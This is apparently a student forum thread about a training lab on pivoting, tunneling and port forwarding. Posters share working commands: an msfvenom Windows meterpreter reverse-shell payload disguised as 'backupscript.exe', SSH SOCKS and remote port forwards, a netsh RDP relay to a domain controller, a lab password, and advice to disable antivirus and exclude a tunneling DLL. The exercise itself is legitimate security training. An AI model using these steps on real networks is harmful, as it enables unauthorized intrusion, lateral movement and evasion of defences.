Pivoting, tunneling, and port forwarding | Academy

How were you able to RDP into the Windows host and run the payload? I tried proxychains xfreerdp but nothing seems to be working.

Yeah I can get to the windows host and run the payload, but aside from using socat I cant get any connection back to my attack host. Which section are you on?

I’m currently on “Remote/Reverse Port Forwarding with SSH”.
I answered the questions but I wanted to practice the methods taught before moving on to the next section, but I can’t seem to get into the Windows host via RDP.

Am I overlooking something? Are we supposed to enum the pivot machine? Or brute force the Windows machine?

No need to brute force or anything like that. Use the same method as the prior section, ssh -D 9050 into the ubuntu machine, the use proxychains xfreerdp into the windows box. Just make sure you have the ssh -D 9050 active while using proxychains.

If you can get the exploit to connect back to your attack host let me know!

Oh i got it, i realized it was the credentials in the previous section haha

i got the reverse shell working by simply following the reading.
i used msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8000 to generate my payload.
For the ssh remote port forward i used ssh -R ubuntu@ -vN
For the metasploit exploit i set the payload as windows/x64/meterpreter/reverse_https, lhost as and lport as 8000

Weird, I have tried that many times and the windows box never connects back. Were you using pwnbox or you own VM?

I was using the pwnbox provided

For the last section RDP and SOCKS Tunneling with SocksOverRDP can anyone give me some hints on how I should be attacking the other user to get admin? I am assuming that is what I need to do since windows keep deleting SocksOverRDP-Plugin.dll

I keep finding different password for bob every time I try or reset this module. But I can never use the creds I find, I tried winrm, smb, RDP, and logging in as bob through powershell. Can anyone help me out?


I used these commands:

First RDP into the Windows box OFFICEMANAGER. Then enter the command below in a CMD window:

netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress= connectport=3389 connectaddress=

Then, from my Kali box, RDP through the OFFICEMANAGER box on port 8080 to DC01:

xfreerdp /v: /u:victor /p:pass@123 /cert:ignore +auto-reconnect

I got right in. The only thing different was the ‘listenaddress.’

It makes more sense to put instead of the IP address (learned this from the CRTP course).

Obviously, your IPs will be different. Also, I used VPN and Kali, not the PwnBox.


Were you able to complete the module?

Ok, will that helps a ton!

I was trying to use SockOverRDP and it kept killing my .dll file.

So I can get connected to INLANEFREIGHT\victor now, but so far I still cannot get to the target. I think I am not understanding something here…

NVM, I got it. I was trying to connect to 172.16.155 with Jason… Thank you for the help! The module was clearly intentionally misleading me :slight_smile:

Can I ask what CRTP course is? Thanks!

Certified Red Team Professional by Pentester Academy.

1 Like


disable the real-time protection in the anti-virus and add the SocksOverRDP file to the exclusion in the virus and threat protection setting

1 Like

Thanks! I’ll have to go back and try that.